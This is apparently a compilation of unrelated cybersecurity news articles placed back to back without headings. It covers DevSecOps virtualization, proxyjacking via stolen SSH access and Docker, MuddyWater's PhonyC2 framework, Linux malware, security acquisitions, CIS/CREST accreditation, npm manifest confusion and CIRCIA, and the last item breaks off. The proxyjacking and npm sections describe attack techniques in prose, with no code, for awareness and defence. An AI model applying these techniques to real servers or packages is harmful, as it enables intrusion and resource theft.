The practice of shifting security left has its roots in DevOps, an agile methodology designed to reduce the time it takes for software projects to go from concept to production. By taking a proactive approach to secure development, organizations can reduce the risk of cyber attacks and system outages due to malicious actors or accidental errors. As such, shifting security left has become an increasingly important part of modern software development.

At the same time, virtualization technology has revolutionized the way software development is done, and DevSecOps is no exception. Enterprises are moving security practices and accountability further left in the software development lifecycle (SDLC). By arming developers themselves with the ability to detect and prevent potential risks and threats in the early stages of the CI/CD workflow, new technologies, like Corellium, are also helping security teams scale their expertise and free up their time to focus on more complex security concerns. Virtualization enables DevSecOps teams to easily and continuously test for potential vulnerabilities in a safe, secure environment.

Corellium's virtual mobile and IoT devices make it possible to identify security issues while they are still in development. Virtualization gives developers the ability to quickly deploy isolated environments for testing software before its released into production. Applying security testing at the early stages of and continuously throughout development makes it possible to catch security vulnerabilities before they become major issues. It also saves developers the time and energy required to fix issues discovered in an advanced stage of the development cycle.

Reduce costs and ship ontime with early detection

Did you know it can cost up to 100 times more to fix an issue discovered late in the SDLC than if you find and fix it early? Given the costs, why hasn't security been a bedrock of modern software development all along?

In the early days of software development, most attacks required physical access to a terminal on the machine running the application, which meant a lower risk of software being manipulated by someone on the outside. In the years that followed, enterprises adopted new software development methodologies, yet security was rarely prioritized within the SDLC. Instead, organizations assigned application security to dedicated security teams and testing took place after an application's release. This can leave potential vulnerabilities exposed to attackers for exploitation for weeks or even months.

Over time, most companies have adopted pre-release security testing to reduce the number of potential vulnerabilities released in their applications, a process that often takes several weeks to complete and whose unpredictable outcome could cost you dearly. A security test might find a few vulnerabilities or bugs that can be fixed in a few hours or days, or it might find dozens or hundreds of issues. Depending on the vulnerability, fixing it could require significant changes or entire replacements of underlying components. And of course, once implemented, the fixes will also need to be retested for application requirements and security. This can--and often does--set developers back by weeks as they try to meet now-impossible release deadlines.

Fortunately, with today's virtualization technology, teams can receive quicker feedback using dedicated tools to build reports and share their findings, increasing the overall speed of development and deployment, as well as the agility of the team. Updates and patches can also be done within a tighter turnaround, leading to faster and more secure releases.

Increase individual and teamwork efficiency with more flexibility

Virtualization also makes DevSecOps more efficient by making it easier to provision and manage multiple environments. The technology behind virtualization, called a hypervisor, for Arm processor-based hardware enables the creation of virtual versions of device hardware - from phones to IoT devices - for nearly unlimited R&D applications. Virtual machines can be quickly set up and scaled up for any changes that need to be implemented without the time, costs, and risks associated with procuring and shipping physical devices.

With virtualization developer, security, and testing teams work better and faster together through simplified snapshot, restore, and cloning functionality. Closer collaboration among all these teams removes friction, creates a more secure development environment, and improves overall software quality.

The use of virtualization technology in DevSecOps has enabled greater security from the start, as well as shorter development cycles, reduced costs, and increased agility. Virtualization is essential for any team looking to take advantage of DevSecOps and ensure their mobile and IoT applications are not only more secure, but also built and tested efficiently.

Hackers are using commercial proxy networks that pay users for their bandwidth to monetize their illegally obtained access to servers. Dubbed proxyjacking, this type of abuse has been increasingly observed alongside other forms of abusing hacked servers, such as cryptojacking.

“Although the concept of proxyjacking is not new, the ability to easily monetize it as affiliates of mainstream companies is,” researchers from Akamai said in a report. “Providing a simple path to financial gain makes this vector a threat to both the corporate world and the average consumer alike, heightening the need for awareness and, hopefully, mitigation.”

The Akamai team recently investigated several campaigns in which attackers used compromised SSH credentials to deploy a series of scripts that turned the servers into proxy clients on the Peer2Profit and Honeygain networks.

Both services are advertised as passive income tools that allow users to share their unused bandwidth and IP address as part of a crowdsourced network of proxy servers that is then used by paying companies for data collection, advertising, and other activities. These are meant to be volunteer-based services that require users to install a client application on their computers or mobile phones.

“The scenario drastically changes when an application is deployed without the knowledge or consent of the user, effectively exploiting their resources,” the Akamai researchers said. “This is where the seemingly innocuous act of using these services pivots into the realm of cybercrime. The attacker, by commandeering multiple systems and their bandwidth, effectively amplifies their potential earnings from the service, all at the victims’ expense.”

The attack is similar in concept to cryptojacking, the act of using a machine’s computing resources to mine cryptocurrencies without the knowledge or approval of the system’s owner. Mining cryptocurrency is otherwise a legitimate activity that users can willingly opt into, and the mining software is generally free and open source. Attackers use the same software, but in an abusive way.

Proxyjacking via Docker containers

In the attacks observed by Akamai via its honeypot systems, attackers first logged in via SSH and executed a Base64-encoded Bash script. The goal of this script is to connect to an attacker-controlled server and download a file called csdark.css. This file is actually a compiled version of curl, a widely used Linux command-line tool that’s used to download files.

The executable is not detected by any antivirus engine on VirusTotal because it is a legitimate and unmodified version of curl, which is likely whitelisted as a system tool. After curl is deployed on the system, the Bash script changes the working directory to a temporary one that’s usually writable and executable to all users such as /dev/shm or /tmp. It then proceeds to download a Docker container image that comes preloaded and preconfigured with the Peer2Profit or the Honeygain clients along with the attacker’s affiliate ID on the networks so the hijacked systems get registered under their account.

Before deploying the downloaded Docker container image under the name postfixd, the script checks if other competing containers possibly deployed by other attackers are running and stops any that are found. Postfix is a popular email transfer agent for Linux, so the attackers picked this name followed by d (daemon) to make their container less conspicuous among the list of processes on the system.

Both Peer2Profit and Honeygain provide public Docker images for their clients and they are fairly popular with over a million downloads, so the attackers didn’t have to do much work to set up the environment and tools. The web server where attackers host their renamed curl executable seems to have been hacked and contains a cryptomining tool. This suggests the attackers behind these proxyjacking campaigns also engage in cryptojacking.

“In this particular campaign, we saw the use of SSH to gain access to a server and install a Docker container, but past campaigns have exploited web vulnerabilities as well,” the Akamai researchers said. “If you check your local running Docker services and find any unwanted resource sharing on your system, you should investigate the intrusion, determine how the script was uploaded and run, and perform a thorough cleanup.”

A previously unseen command-and-control (C2) framework called PhonyC2 has been attributed to the Iranian state-sponsored group MuddyWater. 

The custom-made, and continuously developing PhonyC2 was used by the threat actor to exploit the log4j vulnerability in the Israeli SysAid software, the attack against Technion, an Israeli institution, and the ongoing attack against the PaperCut print management software, according to a report by Deep Instinct. 

"At the beginning of May 2023, Microsoft's Twitter post mentioned they had observed MuddyWater exploiting CVE-2023-27350 in the PaperCut print management software," Deep Instinct said in its report, adding that while Microsoft did not share any new indicators, they noted that MuddyWater was using tools from prior intrusions to connect to their C2 infrastructure and referenced their blog on the Technion hack, which the researchers already established was using PhonyC2.

"About the same time, Sophos published indicators from various PaperCut intrusions they have seen. Deep Instinct found that two IP addresses from those intrusions are PhonyC2 servers based on URL patterns," Deep Instinct said. 

MuddyWater has been active since 2017 and is generally believed to be a subordinate unit within Iran's Ministry of Intelligence and Security. Its top targets include Turkey, Pakistan, the UAE, Iraq, Israel, Saudi Arabia, Jordan, the US, Azerbaijan, and Afghanistan. The group primarily conducts cyberespionage activities and intellectual property (IP) theft attacks; on some occasions, they have deployed ransomware on targets.

Custom-made PhonyC2

Three malicious PowerShell scripts that were a part of the archive of PhonyC2_v6.zip were identified in April by Deep Instinct.

"The filename piqued our interest and we set out to discover if it was a known C2 framework. After a quick investigation, it was revealed that the C2 framework was found by Sicehice in a server with an open directory listing," Deep Instinct said in the report. 

Sicehice is an organization that automates the collection of cyberthreat intelligence from over 30 sources and enables users to search against the collected IPs.

The PhonyC2 written in Python3 has been active since 2021. It is structurally and functionally similar to MuddyC3, a previous MuddyWater custom C2 framework written in Python 2.

"This C2 is a post-exploitation framework used to generate various payloads that connect back to the C2 and wait for instructions from the operator to conduct the final step of the 'Intrusion Kill Chain'," Deep Instinct said.

Attributing PhonyC2 to MuddyWater

Analysis of the code showed that it used Ligolo, tunneling tool-bore, and open source tool FRP, all of which have been previously used by MuddyWater.  

Additionally, it had IP addresses that the threat actor used. Both addresses are mentioned as C2 servers in the report Microsoft published about their findings from the Technion attack, which they attributed to MuddyWater. 

"The combination of the presence of known MuddyWater tools on the server and the fact that the threat actor communicated with two IP addresses known to be used by MuddyWater raised suspicion that PhonyC2 is a framework used by MuddyWater," Deep Instinct, warning that MuddyWater is continuously updating the C2 and changing TTPs to avoid detection.

In April, Microsoft detected destructive operations enabled by MuddyWater in both on-premises and cloud environments. Previous attacks by MuddyWater mainly impacted on-premises environments. However, in this case, Microsoft found the destruction of cloud resources as well.

Growing at close to 20% year-over-year, the Linux operating system market is expected to touch $22.15 billion in 2029 from a mere $6.27 billion in 2022, according to Fortune Business Insights. However, with growth, comes opportunities, and sometimes these are opportunities for threat actors.

Linux has gained significant popularity and broader adoption in various domains, including servers, cloud infrastructure, Internet of Things (IoT) devices, and mobile platforms.

The increased adoption of DevOps and modern applications is making Linux the platform of choice for servers and hence developers are increasingly developing it.

"Linux powers critical infrastructure, servers, and cloud environments, making it an appealing target for attackers aiming to compromise sensitive data, disrupt services, or launch broader attacks," said Royce Lu, distinguished engineer at Palo Alto Networks. 

In 2022, Palo Alto Networks observed Linux malware samples increase by 18.3% compared to 2021. Keeping with the trend of increasing attacks from December 2022 to May 2023, the maximum daily number of encounters with malicious ELF files (targeting Linux-based OSes) increased by almost 50%, according to Stefano Ortolani, threat research lead at VMware. 

Weak security practices are making Linux systems vulnerable

Improperly configured Linux systems or weak security practices, such as default or weak passwords, unpatched software, and unsecured network configurations can make them vulnerable to attacks. 

However, as more critical systems are now running on Linux, it would also allow attackers to demand bigger ransom and hence a ransomware attack could potentially become more disruptive to customers.

"In addition to servers, millions of Internet of Things (IoT) devices run on Linux, effectively expanding the attack surface of organizations across all verticals, especially in critical infrastructure," Dean Houari, director of security technology and strategy at Akamai, APJ, said.

Ransomware groups such as Agenda, BlackCat, Hive, and RansomExx have also developed versions of their ransomware in the programing language Rust. Using Rust allows the groups to customize malware for Linux.

In March, APT, Iron Tiger updated its malware to target the Linux platform. In April, Chinese hackers, Alloy Taurus, launched a Linux variant of PingPull malware. In May, a new variant of the IceFire ransomware started targeting Linux enterprise systems. 

Another reason that could be attributed to the increase in attacks is the vulnerabilities in applications running on Linux. "We saw the Log4j attack because of a vulnerability in the Apache server. Apache runs on Linux as well and thus such vulnerabilities can also mean increased attacks," said Sharda Tickoo, technical director for India & SAARC at Trend Micro.

While ransomware targeting Linux-based systems has been on the rise, a huge share of encounters is still variants of Mirai repurposed to mine Bitcoins or Monero, Ortolani said. 

"As long as cryptocurrencies are easily fungible, we can expect more and more cybercriminals to take advantage of insufficiently protected systems," Ortolani said. 

Timely vulnerability patches required

While Linux systems were generally considered secure, analysts say the need of the hour is to focus on timely vulnerability patches. 

"The strategy used to infect Linux systems is different from Windows as Linux is more susceptible to vulnerabilities", Houari said. "The high number of Linux vulnerabilities and dependency on open source code is a challenge for security teams to ensure that they are patched in a timely manner which could allow attackers to gain access to these systems effectively bypassing the perimeter security and obtaining privileged access for further reconnaissance and attacks." 

Organizations must adopt a zero trust strategy to embed security into the infrastructure so that it is possible to systematically address the threat vectors at all levels thereby reducing the overall attack surface, according to Ortolani. Organizations need to have strong authentication and access controls, monitor and log activities, utilize security-hardening techniques, and educate users about best practices for using Linux systems securely.

Uncertainty and instability marked the end of 2022 for many in the tech sector, a trend that bled into the beginning of 2023. Following on the heels of a drought in IT talent came mass layoffs at many of the world's biggest tech companies as predictions of recession loomed and war in Ukraine dragged on with no end in sight.

Global concern over cybersecurity has never been higher, with attacks coming fast and furious and in ever-growing numbers, and 65% of organizations planned to increase cybersecurity spending in 2023. That means CISOs may be pressured to do more with what they have as budgets shrink even as demand for security increases. And they should be aware of what could change if one of their vendors is acquired in this climate.

Corporate deals have dropped from the highs of 2021 as well as investors proceed with caution, eyeing interest rate increases and the possibility of a recession. There were some indications that cybersecurity might be an outlier in 2023--that M&A activity might remain a little more robust than in other parts of the tech world. "There are abundant opportunities for innovation in cybersecurity as new technology breakthroughs, such as the near-human capabilities of ChatGPT, introduce new and largely unaddressed security risks," DataTribe noted in its fourth-quarter 2022 Insights.

While recognizing the ever-growing importance of cybersecurity and the ever-growing demand to protect against increasingly sophisticated--and numerous--bad actors, dealmakers are likely to be active but cautious in the year to come. 

Below are the deals that CSO has selected as the most significant of the year. (This list is updated periodically as new deals are announced.)

Thales agrees to buy Tesserent

June 13: Defense technology and security provider Thales has agreed to buy Australian cybersecurity firm Tesserent in a deal that values to the firm at about $111 million. Paris-based Thales said the deal will enable it to "accelerate its cybersecurity development roadmap and expand its footprint in Australia and New Zealand." Tesserent will continue to operate under its current name, but its branding will include the "Cyber Solutions by Thales" tagline. "With the acquisition of Tesserent and its highly skilled team of cyber experts, and combined with our own system engineering experts, Thales Australia will establish an Australian/New Zealand leader in Cyber Defence able to best protect the country and its national infrastructure from cyber threats," Thales Australia CEO Jeff Connolly said in a release.

Informatica announces intent to acquire Privitar

Informatica has agreed to buy Privitar with the intention of integrating its access controls and remediation for data privacy and security into Informatica’s AI-powered Intelligent Data Management Cloud platform. Privitar is a "UK-based data management access and privacy software provider that powers organizations to democratize the ethical and safe use of data across enterprises," Informatica said in a statement. "Data governance and responsible use of data is a growing priority for large businesses, but too often requires trading off agility and self-service," said Informatica CEO Amit Walia.

Dataprise acquires Texas-based managed service provider RevelSec

June 21: Dataprise, a provider of managed IT, cybersecurity, and cloud solutions, has acquired RevelSec for an undisclosed amount. RevelSec, a security-first managed service provider headquartered in Texas, will "further expand Dataprise's national footprint and add high-value vertical expertise while providing RevelSec clients access to Dataprise's broad portfolio of powerhouse services," the companies said in a statement. RevelSec serves 200 clients across industries including financial services, healthcare, and oil and gas.

Daisy Corporate Services completes acquisition of ECSC Group

June 22: Daisy Corporate Services has completed its acquisition of breach prevention, detection and response support company ECSC Group. In a statement on its website, Daisy said the purchase "provides highly complementary services" to its "current operational resilience offerings, therefore providing an enhanced customer proposition." Founded in 2000, ECSC provides expert security breach prevention, detection and response support to almost 425 customers across all sectors and including a range of corporate and blue-chip organizations. "We firmly believe that together we will become the UK's leading cyber security organization," said ECSC CEO Matthew Briggs.

Socure buys Berbix for $70 million

June 27: Digital identity verification solutions provider Socure has acquired San Francisco-based startup Berbix for about $70 million. Berbix, founded in 2018 by former members of the Airbnb Trust and Safety Team, has developed a high-accuracy document verification solution with a forensics engine able to detect spoofed IDs, including AI-generated fakes.

Mozilla buys fake-busting software firm Fakespot

May 2: Not-for-profit tech foundation Mozilla has bought fake-busting software developer Fakespot. Fakespot uses artificial intelligence (AI) and machine learning (ML) systems to detect patterns and similarities between reviews to flag those that are most likely to be deceptive. The system helps sort real reviews from fake ones, to support trust and confidence among those making online purchases. Mozilla said it will continue to invest in enhancing Fakespot for current users but plans to develop future Fakespot integrations that will be unique to Mozilla's Firefox browser.

Private equity firm acquires Absolute software for $657 million

May 11: Crosspoint Capital Partners has agreed to buy self-healing, intelligent security solutions provider Absolute Software for US$657 million excluding debt in a deal that will take the NASDAQ-traded company private. "We are impressed with how Absolute has built upon its asset visibility and control heritage and expanded into solutions that provide endpoint resilience and the reliable access needed in today's hybrid work environments," Crosspoint managing partner Greg Clark said in a statement. Absolute provides self-healing, intelligent security solutions that offer a permanent digital connection that intelligently and dynamically applies visibility, control, and self-healing capabilities to endpoints, applications, and network connections.

Exiger acquires software supply chain and SBOM management platform Ion Channel

May 16: Security software as a service provider Exiger has bought software supply chain risk management platform Ion Channel. The acquisition will expand Exiger's depth of analysis in vendor and open-source software cyber risk, CEO Brandon Daniels said in a statement. "From entities to software to raw materials, Exiger's technology now covers all potential product risk so our customers can regain control of their supply chains." Ion Channel has developed a proprietary risk model that analyzes 1.5 trillion events in open-source and proprietary software components daily and tracks more than 100 leading risk indicators to detect security and operational risk months in advance of known vulnerabilities. Ion Channel's C-SCRM solution will be incorporated into Exiger's FedRAMP SaaS platform.

IBM acquires Polar Security

May 16: Tech giant IBM has acquired data security posture management (DPSM) provider Polar Security to bolster its cloud security offerings. Polar Security's platform helps to manage "shadow data" -- sensitive data not being tracked or managed by a company. DSPM reveals where sensitive data is stored, who has access to it, how it's used, and identifies vulnerabilities with the underlying security posture, including policies, configurations, or data usage. Polar Security's DSPM technology will be integrated into IBM's Guardium family of data security products.

Onfido buys digital identity-sharing technology developer Airside Mobile

May 22: Automated identity verification company Onfido has acquired Airside Mobile. Airside is noted as among the first to bring user-controlled digital identity to the travel industry. The company's privacy-first identity management technology will be combined with Onfido's verification platform to allow "verify once, use anywhere" use where customers can manage their own digital identity stored on a smartphone.

Cisco plans to buy Armorblox to help create "an AI-first Security Cloud."

May 31: Cisco has agreed to purchase email security platform Armorblox for an undisclosed amount. Cisco security Chief Product Officer Raj Chopra said Armorblox's use of predictive and generative AI "will change the way our customers understand and interact with their security control points." In a blog announcing the pending acquisition, Chopra said Armorblox's techniques may also be applied to attack prediction, rapid threat detection, and efficient policy enforcement.

OpSec Security agrees to buy Zacco

April 4: Brand integrity firm OpSec Security has agreed to buy intellectual property Danish intellectual property management and protection company Zacco, the two companies said in a statement. Zacco combines traditional legal expertise with digital brand management and security. The addition of Zacco will "combine the respective strengths of the two businesses to help customers maximize the value of their IP portfolios, take advantage of new opportunities, and counter vulnerabilities and threats these may bring," OpSec said.

TrustCloud and Branddocs merge

April 11: In a reverse takeover, secure digital transaction and video verification services Branddocs acquired secure digital transaction choreographing platform TrustCloud for an undisclosed amount. The new company will operate as TrustCloud, combining Branddocs' client base and in-house network of fraud detection experts, AI/ML technologies, multi-orchestration capabilities, and the TrustCloud modular platform to deliver globally compliant, frictionless, and vendor-agnostic services.

Columbus acquires ICY Security

April 11:  Columbus has acquired ICY Security in an expansion aimed at meeting customer demand for cyber security services. Denmark-based ICY Security is among the Nordic countries’ largest consultancies and implementation companies in the area of identity and access management (IAM). "The acquisition of ICY Security is an important investment in extending Columbus' offerings following the increased need for cybersecurity services from our customers," Columbus CEO and President S?ren Krogh Knudsen said in a statement.

Akamai acquires Neosec

April 19: Content delivery network and cloud security services provider Akamai Technologies has agreed to buy privately held API detection and response platform Neosec. The acquisition will extend Akamai's visibility into the rapidly growing API threat landscape, the company said in a statement. "The combination is designed to make it easy for customers to secure their APIs by helping them discover all of their APIs, assess their risk, and respond to vulnerabilities and attacks."

Cisco agrees to buy Lightspin Technologies

March 29: Software and service giant Cisco has agreed to buy privately held cloud security software Lightspin Technologies for an undisclosed amount. Lightspin offers end-to-end cloud security posture management (CSPM) across cloud-native resources. The company will join Cisco's emerging technologies and incubation (ET&I) business.

Mastercard acquires Baffin Bay

March 20: Mastercard has bought Swedish cybersecurity firm Baffin Bay to increase its cloud-based protections. The company will integrate Baffin Bay's cloud-based solution that uses AI technology to automatically filter and counteract malicious internet traffic into its current offerings. "The addition of Baffin Bay Network's instantaneous, predictive and cloud-based  AI technology to our existing analytical capabilities will deliver a leading, singular cyber solution," Mastercard said in a statement.

HPE acquires Axis Security

March 2: Hewlett Packard Enterprise (HPE) agreed to buy cloud security services provider Axis Security, its third acquisition since January, to deliver a unified secure access service edge (SASE) offering. The acquisition is aimed at incorporating the Axis security service edge (SSE) platform into HPE's edge-to-cloud network security capabilities to deliver integrated networking and security solutions as-a-service. HPE plans to integrate Atmos, an SSE offering by Axis Security, into Aruba, its platform for edge-to-cloud networking with AI-based network automation. "The convergence of Aruba and Axis Security solutions will transform edge-to-cloud connectivity with a comprehensive SASE solution that provides enterprises with the highest levels of security for both IoT devices and all users' access across geographically distributed locations," Phil Mottram, executive vice president and general manager, HPE Aruba Networking said in a statement.

Online auction giant eBay Acquires 3PM Shield

February 13: eBay acquired 3PM Shield, a provider of monitoring solutions designed to prevent the sale of counterfeit items, unsafe products and illegal goods. The purchase will help provide sellers and buyers with a safe and trusted platform and enhances eBay’s ability to address suspicious or harmful seller behavior and potentially problematic items. "3PM Shield has been a valued and effective external partner in helping eBay tackle these challenges and we look forward to unlocking additional capabilities as we bring their technologies in-house," eBay Chief Risk Officer Zhi Zhou said in a statement.

Accenture buys Brazil-based Morphus

February 13:  New York-based Accenture has acquired privately held cyber defense, risk management, and cyber threat intelligence services provider Morphus for an undisclosed amount. Brazil-based Morphus provides red and blue team services; governance, risk, and compliance services; enterprise risk management; cyber strategy; threat intelligence; and managed security services. "The acquisition brings more than 230 highly skilled professionals, making Accenture one of the largest cybersecurity professional services providers in Brazil," Accenture Security global leader Paolo Dal Cin said in a statement. The acquisition launches Accenture's cyber industry practice in Latin America.

Vista Equity Partners completes acquisition of KnowBe4

February 1: Investment firm Vista Equity Partners completed its acquisition of security awareness training and simulated phishing platform KnowBe4 for $24.90 per share in cash, valuing the company at about $4.4 billion. "The human element remains one of the most important yet neglected aspects of cybersecurity," Michael Fosnaugh, co-head of Vista's Flagship Fund and senior managing director, said in a press release. "The opportunity to scale a business that is truly mission-critical to enterprises around the world is core to Vista's investment approach and value creation efforts." Vista focuses exclusively on acquiring enterprise software, data, and technology-enabled businesses.

Radiant Logic signs definitive agreement to acquire Brainwave GRC

February 1: California-based Radiant Logic entered into a definitive agreement to acquire French identity governance and analytics company Brainwave to accelerate the companies' shared vision of an identity data fabric using data science to ensure the right information is in place to make the right policy decisions. "Demand is increasing for cybersecurity, governance, and compliance solutions that help companies address the continually evolving security threats, especially as regulatory environments and fines become more prevalent," said Joe Sander, CEO of Radiant Logic, in a press release. The companies said the acquisition will strengthen their market positions as identity, analytics, and intelligence experts and provide a zero-trust and identity-first security foundation to deliver enhanced data security, reduced audit and compliance costs, and improved understanding and visibility of malicious activity.

Veridos becomes majority shareholder in NetSeT

January 30: Berlin-based Veridos has acquired a majority stake in NetSeT Global Solutions, a move the company says will strengthen its position as a full-service provider of integrated identity solutions. NetSeT, based in Serbia, develops information systems for the management of citizen data and information security. In 2017, Veridos acquired a minority stake in NetSeT, which will now be integrated into the Veridos Group. "With this acquisition, we are expanding our position as a provider of holistic identity solutions to cover the entire value chain: from citizen registration to the creation and personalization of ID documents and the management of citizen data to document verification," Veridos CEO Marc-Julian Siewert said in a press release. The move comes after 20 years of collaboration between Veridos and NetSeT. In joint projects, the companies have co-operated in providing the ID system for northern Macedonia, ePassport systems for Bangladesh, Venezuela, and the United Arab Emirates, and a driver’s licence system for Uganda.

Simeio acquires identity and access management firm PathMaker

January 10: Specialized identity and access management (IAM) services provider Simeio acquired Texas-based identity governance firm PathMaker Group in a move that will enhance Simeio's consulting services and SailPoint implementation capabilities, the company said. “This acquisition solidifies our commitment to integrate future-ready technologies to protect and secure identities. "Simeio CEO Chris Schueler said in a press release. "I am very confident in the unmatched identity security services that our clients can take advantage of as a result of this acquisition.” Simeio operates a portfolio of end-to-end services in advisory, building, and managing identity security solutions. PathMaker's IAM MAP assessment process and methodology will be incorporated into          Simeio's proprietary identity orchestration platform Simeio IO, allowing customers to continuously measure and assess the maturity of their identity programs. Simeio's managed identity security services delivered through Simeio IO will also be accessible to PathMaker clients.

The Center for Internet Security (CIS) and international information security certification body CREST have announced a new joint cybersecurity accreditation initiative for organizations. The CIS Controls Accreditation program aims to provide companies a way to show customers and partners that their cybersecurity posture meets the best practice guidance as set forth in the CIS Critical Security Controls (CIS Controls), a set of globally recognized best practices for improving an enterprise's cybersecurity posture, the pair said. It is the first initiative pairing the CIS Controls with a program to deliver accredited consulting, they added.

Earlier this month, CREST announced a 50% discount for small businesses based in lower income countries as part of its mission to help reduce inequality in access to cyber defenses. The discount, including all associated membership and accreditation fees across all disciplines, will apply to eligible new member applicants and on renewal for current members, CREST said. In April, CREST also published a new guide to fostering financial sector cyber resilience in developing countries, outlining the need for appropriate, multi-party cyber resilience testing to ensure better cyber safety in developing nations, along with advice for governing authorities.

CIS Controls Accreditation an organizational level cybersecurity "stamp of approval"

The CIS Controls Accreditation is an opportunity for CIS SecureSuite Members (Controls, Consulting & Services, and Product Vendor) and CREST members to demonstrate that their implementation of security best practices is guided and externally assessed in accordance with the training and validation defined by two authorities in cybersecurity, read a press release. The program offers service providers a "stamp of approval" at the organization level, assuring that their customers can feel confident that they are doing business with a reputable and reliable CIS Controls assessment organization, wrote CIS. The scheme is priced at $1,500 USD for members and $2,500 USD for non-members.

The ability to digest all the data and controls from various devices and systems is essential in this massive shift to evidencing security, said Tom Brennan, executive director, CREST Americas Region. "Together, CIS Controls and CREST accreditations give our joint members an accelerated path to meet risk and compliance requirements in addition to providing a methodology for continuously monitoring their security posture. By using CREST on top of the CIS Controls, security professionals can monitor security from infrastructure that can be observed, tested, and enhanced."

The new accreditation is a significant step forward in efforts to secure enterprises and safeguard against current and emerging threats, according to Curtis Dukes, CIS executive VP and general manager, Security Best Practices.

New accreditation welcome, but has narrow technical focus

The new accreditation is a welcome one for the IT industry, says Kevin Curran, IEEE senior member and professor of cybersecurity at Ulster university. "CIS Controls are important because they help companies reduce risk, meet compliance requirements, prioritize resources effectively, and cover multiple security domains," he tells CSO.

They also provide a systematic and structured approach to mitigating the most dangerous cyber threats, and by implementing them, companies can reduce their exposure to a wide range of common attacks and vulnerabilities, he adds. "By following these controls, organizations can enhance their security posture and better protect their critical assets and information."

However, its narrow focus on technical control assessment limits the value it will bring to organizations, James Bore, cybersecurity hygienist and consultant, tells CSO. "There are a lot of schemes like this out there, under different branding and with different levels of marketing. Looking purely at the assessment of technical controls is of limited benefit to organizations who should be looking at more comprehensive frameworks to solve what are ultimately security governance issues," he argues.

Adding certifications to an already over-crowded and inconsistent field does not help anyone, he adds. "Really what's needed is more effort to rationalize the standards and certifications we have, improve understanding of the relevant governance areas, and focus on what's genuinely effective."

The npm (Node Package Manager) ecosystem of JavaScript packages has a by-design bug that attackers could potentially exploit to hide malicious dependencies and scripts inside packages. The issue, dubbed manifest confusion, stems from the lack of consistency between manifest files that accompany archived packages and the JSON metadata file included in the package itself.

The issue was publicly disclosed this week by Darcy Clarke, a former staff engineering manager for the npm CLI team. Clarke left GitHub, which owns npm, in December, but he said GitHub has been aware of this issue since November, and he notified them again in March when, after independent research, he came to the conclusion that the impact is greater than originally thought.

According to Clarke, the general assumption in the community is that manifests published alongside a package on the npm registry match the contents of the package.json metadata file that’s included inside the package itself — the tarball archive downloaded from the repository. This is not true and client-side JavaScript package managers such as npm, but also security tools that scan packages from the npm repositories, do not properly validate these files against each other.

This means packages might have hidden dependencies or installation scripts listed in their package.json files but not in the separate manifest file. These dependencies and scripts will be parsed and executed by client-side JavaScript clients such as the npm command line interface (CLI) and others even though they’re not listed inside the package manifest.

“There are several ways this bug actually impacts consumers/end-users: Cache poisoning (i.e., the package that is saved may not match the name+version spec of that package in the registry/URI), installation of unknown/unlisted dependencies (tricking security/audit tools); execution of unknown/unlisted scripts (tricking security/audit tools); potential downgrade attack (where the version specification saved into projects is for a unspecified, vulnerable version of the package),” Clarke said.

Source-of-truth confusion

At its core, this issue is caused by the fact that there is not one clear “canonical source of truth” for the metadata for a package; things like name, version, dependencies, scripts, license and more. These are specified in the package.json file that is included in the package archive itself and supports integrity verification values like cryptographic hashes. However, some of the same data can be specified in the package manifest file when publishing it on the npm registry and this manifest dictates the information the registry will display.

For example, Clarke created an example package whose package.json file listed another package as a dependency, but when he published it he didn’t include the dependency in the manifest. As a result, the entry of the package on the npm.js repository lists the package with 0 dependencies, because the registry uses the manifest as the canonical source of truth. However, the registry itself doesn’t actually validate that the package.json information matches the manifest information. That task is left to the client installing the package. As it turns out, the clients don’t really perform this validation either.

For example, npm version 6 (npm@6), which shipped with the Node.js runtime version 14 (long-term support), will execute an install script defined in the package.json even if the script is not defined in the manifest. A listed dependency in package.json that is missing from the manifest will not be deployed the first time the package is downloaded and installed. However, if that package is cached locally and later installed again from the local source with the –prefer-offline and the –no-package-lock command line options, the hidden dependencies from package.json will be installed.

Npm version 9 (npm@9), the current stable version of npm, will similarly install dependencies referenced inside a cached package’s package.json when using the –offline config.

The yarn and pnpm package managers that are alternatives to npm are also vulnerable and will execute scripts referenced in the package.json file that are absent from the manifest. Yarn will also prefer the package version defined in package.json over the one in the manifest. Because these two values can be different, it opens the door to a downgrade attack.

Downgrade attacks are dangerous because a package can be replaced with an older version that has a known vulnerability. There’s no shortage of package versions with vulnerabilities, even in the actively maintained projects. Last week researchers from Snyk and Redhunt Labs released the findings of a research project that involved scanning more than 11,000 repositories belonging to the top 1,000 organizations on GitHub. The scan looked for vulnerabilities in the dependencies listed in those projects that spanned multiple programming languages. For JavaScript (npm and yarn), the team extracted 1.9 million dependencies and identified around 550,000 instances of known vulnerabilities in them.

Clarke thinks this issue falls under different vulnerability categories, but at the very least CWE-602 Client-Side Enforcement of Server-Side Security. He notes that “there is a history of relying heavily on the client (aka the npm CLI) to do work that should be done server-side.”

Aside from the aforementioned client-side package managers, the issue also impacts other third-party tools and package registries, including security-focused ones: Snyk, the Chinese NPM Mirror, the CloudFlare npm CDN mirror, the UNPKG CDN mirror, Skypack, JSPM, and even local repositories created with jFrog’s Artifactory.

No easy fix for manifest confusion vulnerability

Fixing this issue and suddenly enforcing validation is not straightforward and might take a while until GitHub comes up with a solution because there are likely many packages that have this manifest confusion and not for malicious reasons. Clarke noted that the npm CLI itself causes such inconsistencies, too. For example, when publishing a package through the npm CLI where a binding.gyp file is located inside the project, the client will add an entry to the manifest file called: “node-gyp rebuild” scripts.install. This entry will not be present in the package.json file.

“GitHub is understandably in a tough spot,” Clarke said. “The fact that npmjs.com has functioned this way for over a decade means that the current state is pretty much codified and likely to break someone in a unique way. As mentioned before, the npm CLI itself relies on this behavior and there are potentially other non-nefarious uses of this in the wild today.”

Users should contact any known authors of tools that rely on npm and ask them to rely on package.json information rather than the manifest, except for the version and name which could different for legitimate reasons. Another option would be to use a proxy between the client and the registry that strictly validates the metadata from both sources for consistency.

On the heels of a string of high-profile breaches, in March 2022, US President Joe Biden signed the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA), which mandates that the Cybersecurity and Infrastructure Security Agency (CISA) develop and implement regulations requiring critical infrastructure organizations to report cyber incidents and ransom payments to CISA. The bill requires critical infrastructure operators to tell CISA within 72 hours of when a cyber incident has occurred. The law also requires organizations to report ransom payments within 24 hours of making the payments.

In September 2022, CISA issued a wide-ranging request for information (RFI) asking for public feedback on many questions that would feed into its notice of proposed rulemaking (NPRM). CISA plans to issue its NPRM in March 2024. According to press reports, the Cyber Incident Reporting Council established under CIRCIA expects to send to Congress this summer proposed recommendations on developing an incident-reporting framework across crucial agencies and regulatory bodies.

